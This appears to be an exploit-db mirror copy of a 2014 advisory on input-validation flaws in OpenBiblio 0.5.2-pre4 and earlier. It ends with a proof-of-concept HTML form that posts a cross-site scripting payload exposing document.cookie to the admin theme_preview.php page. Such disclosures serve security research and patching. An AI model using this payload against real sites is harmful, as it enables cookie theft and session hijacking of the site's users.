exploit-db-mirror/platforms/php/webapps/30951.html
Offensive Security e14c52c119 Updated 01_17_2014
2014-01-17 04:18:08 +00:00

13 lines
901 B
HTML
Executable file

source: http://www.securityfocus.com/bid/27053/info
OpenBiblio is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection, cross-site scripting, HTML-injection, and local file-include vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
These issues affect Openbiblio 0.5.2-pre4 and prior versions.
<form action="http://www.example.com/openbiblio/admin/theme_preview.php" method="post">
<input type="text" name="themeName" size="40" value="<script>alert(
document.cookie);</script>"><br><br>
<input type="submit" value="doit">
</form>